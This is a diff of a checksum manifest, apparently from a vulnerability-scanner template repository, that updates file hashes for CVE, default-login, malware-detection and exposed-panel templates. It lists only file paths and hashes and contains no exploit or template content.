dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6
dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e
dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c
dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4
dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592
dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644
dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588
@ -547,7 +547,7 @@ file/malware/vertex-malware.yaml:dbbbe626d020ae4d7bbd344de80b6a54835ec6b5
file/malware/virusrat-malware.yaml:26139365e8bc1b4ca2b45a9490c34b19f986215e
file/malware/wabot-malware.yaml:7d2630471fae89dc585a6cbd284f9bf29e6259d7
file/malware/wannacry-malware.yaml:4d955739e936b2e11fa054b66bb3bcae8b924b49
file/malware/warp-malware.yaml:9c5955f1a0da020828e0294bcdd0ffae3ed6c6e2
file/malware/warp-malware.yaml:9c9807f855164bb0900194f0ed48bd194d310ea5
file/malware/xhide-malware.yaml:1014bac698098d85b1de13cce518523719c41021
file/malware/xor-ddos-malware.yaml:f5b4f72a7b0ed38d9d6010429fe0bb69181383ce
file/malware/yayih-malware.yaml:d0632e660caa87b47d08a264fd0625d587900dc8
@ -841,6 +841,7 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e
helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875
helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6
http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2
http/cnvd/2017/CNVD-2017-06001.yaml:5ac8e22a95722f256b2676eb6bb0dfff30ee70c9
http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb
http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9
http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6
@ -1116,7 +1117,7 @@ http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7
http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c
http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7
http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee
http/cves/2014/CVE-2014-3206.yaml:5bcd720008ba2297db841385a8f54f07215edf17
http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a
http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0
http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6
http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e
@ -1170,7 +1171,7 @@ http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86
http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75
http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541
http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8
http/cves/2015/CVE-2015-2863.yaml:ec18b83f753cde2e1efedc78605d4609de00b044
http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f
http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9
http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353
http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218
@ -2348,7 +2349,7 @@ http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b
http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297
http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753
http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3
http/cves/2021/CVE-2021-43287.yaml:86f5633bd3e4a0df1cdc3cf229d5f6c94da694d8
http/cves/2021/CVE-2021-43287.yaml:924e0ab303bf4959fb489490c4a5592747b44abe
http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9
http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92
http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32
@ -2712,7 +2713,7 @@ http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823
http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c
http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab
http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703
http/cves/2022/CVE-2022-33891.yaml:8f81f948758e19f4115f39eb1709b074d2dae3ff
http/cves/2022/CVE-2022-33891.yaml:be15239c35fe6650ca82d85b304b20132ea20b4e
http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b
http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6
http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d
@ -3009,6 +3010,7 @@ http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980
http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3
http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97
http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235
http/cves/2023/CVE-2023-29827.yaml:90f368b70e029388425d8a5ce9c20f8653d6b77b
http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8
http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e
http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5
@ -3068,6 +3070,7 @@ http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe
http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22
http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d
http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae
http/cves/2023/CVE-2023-35158.yaml:93718c34c9acb11a626e4076fe6f21953401b5a4
http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd
http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874
http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9
@ -3077,6 +3080,7 @@ http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12
http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206
http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75
http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b
http/cves/2023/CVE-2023-36347.yaml:80107e418716ca04fb08977e478af1dde95045f3
http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672
http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259
http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef
@ -3155,12 +3159,14 @@ http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65
http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56
http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6
http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d
http/cves/2023/CVE-2023-43374.yaml:cf29b56d8ba36ab18d35d83a0105cbe76841ec1f
http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9
http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb
http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e
http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3
http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542
http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166
http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3
http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b
http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e
http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5
@ -3168,6 +3174,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2
http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf
http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e
http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686
http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964
http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb
http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1
http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96
@ -3203,6 +3210,7 @@ http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598
http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413
http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62
http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3
http/cves/2023/CVE-2023-5991.yaml:2760a58a352d55a71ad7a177100f0513a82ed6c3
http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6
http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427
http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600
@ -3225,6 +3233,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f
http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158
http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14
http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac
http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f
http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49
http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe
http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8
@ -3240,6 +3249,7 @@ http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8
http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e
http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af
http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe
http/cves/2024/CVE-2024-1561.yaml:a134c8864733abe3278ebb6cf67a54c36b6ae29f
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270
http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d
@ -3272,13 +3282,14 @@ http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841
http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a
http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc
http/cves/2024/CVE-2024-3097.yaml:4185bbc6b136c6f1674cf35e66d4c4142e75bb0e
http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d
http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730
http/cves/2024/CVE-2024-31848.yaml:9af993dd7348e9e7863df89ef4f77c8458ad6147
http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc
http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440
http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea
http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba
http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf
http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6
http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d
http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921
http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5
http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17
@ -3439,6 +3450,7 @@ http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f4a51f27c4e839502e7
http/default-logins/sequoiadb/sequoiadb-default-login.yaml:dabe65c9eef1e73cc13c91f81ef91b44503583c4
http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3422db16dfab647a
http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2
http/default-logins/softether/softether-vpn-default-login.yaml:592f93a18fc9a97f31d8a29780dcb874e255d244
http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd
http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5
http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1
@ -3481,6 +3493,7 @@ http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cc
http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862
http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430
http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c
http/exposed-panels/ackee-panel.yaml:fc048c64a3be4b70abcbbdab43592287f34db03d
http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea
http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451
http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733
@ -3523,7 +3536,7 @@ http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e
http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a
http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3
http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6
http/exposed-panels/apache/apache-apisix-panel.yaml:157792ae0cf09e97d18b9374f2730846491a2997
http/exposed-panels/apache/apache-apisix-panel.yaml:2ea899b548359d2406b8a4576eeca268406a122b
http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585
http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6
http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce
@ -3619,7 +3632,7 @@ http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548
http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c
http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d
http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc
http/exposed-panels/cacti-panel.yaml:522433ee64137fb9e5195f26a080b5c0f3b89bc8
http/exposed-panels/cacti-panel.yaml:d8df896275c8442591f3ee3e3fb969618da78aaf
http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176
http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f
http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173
@ -3627,7 +3640,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71
http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2
http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5
http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:1decbcfd31237f785c6a156d79e8db4a25cb2d14
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:bae531af7faf23fccf9f5e1bf192fbc14ffc9969
http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8
http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56
http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023
@ -3692,6 +3705,7 @@ http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e3969
http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558
http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7
http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395
http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90
http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573
http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9
http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996
@ -3751,6 +3765,7 @@ http/exposed-panels/e-mobile-panel.yaml:97952c73a01ba76b8f821e110326a5b8976c077c
http/exposed-panels/eMerge-panel.yaml:128223c03da8481549810a42b35e3c8d88a478eb
http/exposed-panels/earcu-panel.yaml:7d1924978269db09ab39f7d9bb8fbc89a069ebbc
http/exposed-panels/easyjob-panel.yaml:e9d4d870309fc1b13a57009060dc9d7abd9ecef6
http/exposed-panels/easyvista-panel.yaml:a997baadb80031e6e50898c1cb0cd1bf3174902d
http/exposed-panels/eclipse-birt-panel.yaml:99ec0cc6817e95c7b3b8a7025cb949db688a9229
http/exposed-panels/ecosys-command-center.yaml:b6e297af2f5896e0dcc0a4185eb6bcc5805c1152
http/exposed-panels/edgeos-login.yaml:7021c21f36e9df66be21c539248866415245f8aa
@ -3805,6 +3820,7 @@ http/exposed-panels/footprints-panel.yaml:710811c96a4264548ac4c5a43b1185f030179d
http/exposed-panels/forcepoint-applicance.yaml:79eb429c835bf3e0a5073a95a56dc510c974010b
http/exposed-panels/forcepoint.yaml:ad7a86c55f1d8d4d160a7fd2d5f739dfff7a64cb
http/exposed-panels/forti/fortiadc-panel.yaml:c5e5b9d49eb70b71f037b1cb38495868e895bef8
http/exposed-panels/fortinet/f5-next-central-manager.yaml:88b7c61b91dcb46cb80694570e9f6dc214b91f08
http/exposed-panels/fortinet/fortiap-panel.yaml:10a66195ff6d6d49614a0cc15ad20d93cc75c823
http/exposed-panels/fortinet/fortiauthenticator-detect.yaml:6d66b0096515e57ba6be49aff722f6b7e408b1f8
http/exposed-panels/fortinet/forticlientems-panel.yaml:43090f0fc7417ee1bb80dc66bbacc277ed3ef5ff
@ -3832,6 +3848,7 @@ http/exposed-panels/genweb-plus-panel.yaml:722cb54cc9efc1b84972c6d80c994282efb8f
http/exposed-panels/geoserver-login-panel.yaml:c62e462b728c52ae197f5b0446ae908f3401a935
http/exposed-panels/gerapy-detect.yaml:724d1afda108c6a2912bcc793046063e26909b86
http/exposed-panels/gespage-panel.yaml:57eee82ad1606862ed17208b8ff03a7cdba0cb16
http/exposed-panels/ghost-panel.yaml:b756b79a07012086b84e1b3b5e946128e34f85f5
http/exposed-panels/gira-homeserver-homepage.yaml:c88f54ceb96676698f89520661b9594f644d6fc2
http/exposed-panels/git-repository-browser.yaml:5b9b836099213deb45e0d441e5cb66224cf5c8a5
http/exposed-panels/gitblit-panel.yaml:8b14a008bde650f9f125c4b930c2908aa6b95334
@ -3945,7 +3962,7 @@ http/exposed-panels/jeedom-panel.yaml:3fb84bbcfa09ce6964cb2dce502f417498bf82b4
http/exposed-panels/jellyseerr-login-panel.yaml:51a7c1b5d8b5e3f8169bbc8abd9941821477fc41
http/exposed-panels/jenkins-api-panel.yaml:0ba41d9daabab4714bcf58808cfc661c9e9310f2
http/exposed-panels/jenkins-login.yaml:89b0f8e296398a825248bd82947ca61fce3c2a7c
http/exposed-panels/jfrog-login.yaml:07f159d0ee368ce3c235933c257e7781cf687890
http/exposed-panels/jfrog-login.yaml:11757e8cca9629ff2a9ab002a2dedcf867f7692b
http/exposed-panels/joget/joget-panel.yaml:a7dfc3fd4921ef9b756bc772a6ce004594f1c29f
http/exposed-panels/joomla-panel.yaml:c3ea62950f42c467e19f7a5e7760cd69dfd28bd3
http/exposed-panels/jorani-panel.yaml:7dc1efc38bc8c6be36cec66f40d930500c085baf
@ -3971,7 +3988,7 @@ http/exposed-panels/kfm/kaes-file-manager.yaml:163a84373e69e74099b9f771341054ad2
http/exposed-panels/kfm/kfm-login-panel.yaml:d86163cf22c63d250566759202ef64092196705f
http/exposed-panels/kibana-panel.yaml:ab4bffa526cbad54f4b8abf2bc46f5ddc1e4a284
http/exposed-panels/kiteworks-pcn-panel.yaml:8eb88c7a52943afd620e5f92e0f12ea4b2fdef16
http/exposed-panels/kiwitcms-login.yaml:4f2a08cf85319ee93b172cf3e09da11eaa08d097
http/exposed-panels/kiwitcms-login.yaml:e64ae1148fd5fab74c8ea15391bca33551139c2a
http/exposed-panels/kkfileview-panel.yaml:c42a91ee90824170f94bcaaf4a396e33f8d1420b
http/exposed-panels/klr300n-panel.yaml:3e7feed65269887a82bdab5a4971d4748236fdcd
http/exposed-panels/kodak-network-panel.yaml:ff5ef39f196e3dcec90c1df4f05cee3b70ffa854
@ -4025,7 +4042,7 @@ http/exposed-panels/mailhog-panel.yaml:086f46cbe44037b7a0e98e2de15e3b244478c498
http/exposed-panels/mailwatch-login.yaml:5806b40c7aba9a02c1df2d3984844a3d0fbda20c
http/exposed-panels/maltrail-panel.yaml:e64bf45e9330011747c012809705e894700e308b
http/exposed-panels/mantisbt-panel.yaml:a79ef369723d43f4d20f4d94abe7bbabec3afa04
http/exposed-panels/matomo-login-portal.yaml:39af2391e82e09f349ad6ee47898d5604fa4ad25
http/exposed-panels/matomo-panel.yaml:8e36acccca8cb5c975d38a314c941c22a2204faf
http/exposed-panels/mautic-crm-panel.yaml:53a7b87d599c64c95672e30524f3c8bfe053160d
http/exposed-panels/memos-panel.yaml:889e1696bded69cb5833dc1cd22b44ac49318773
http/exposed-panels/meshcentral-login.yaml:6112dd7a01bf42c06b47b029f3aafb08d85f7ee0
@ -4067,6 +4084,7 @@ http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229
http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213
http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847
http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82
http/exposed-panels/n8n-panel.yaml:9d42e6a43dd7de68c76bf38cfd681275147517e5
http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6
http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138
http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad
@ -4085,7 +4103,7 @@ http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d3
http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27
http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a
http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659
http/exposed-panels/netscaler-aaa-login.yaml:cb406a8b3564ac9c8ef51aefb7a59b62040fc8de
http/exposed-panels/netscaler-aaa-login.yaml:54b265bd78107b40ff7b88241e4f5b4e3ec2b6c5
http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571
http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486
http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85
@ -4094,6 +4112,7 @@ http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174
http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5
http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af
http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866
http/exposed-panels/nocodb-panel.yaml:0519137744c936f9cff62dcf92e8b5885a9fef04
http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814
http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3
http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8
@ -4199,6 +4218,7 @@ http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674
http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f
http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6
http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c
http/exposed-panels/pocketbase-panel.yaml:fb5f9369e3ec6a95be6cf0dec0f2fc70639e8176
http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c
http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01
http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403
@ -4229,6 +4249,7 @@ http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5e
http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88
http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753
http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da
http/exposed-panels/qlikview-accesspoint-panel.yaml:cd944a5ea2366ac3dc76a3b95ad122a496f77738
http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4
http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d
http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a
@ -4423,6 +4444,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3
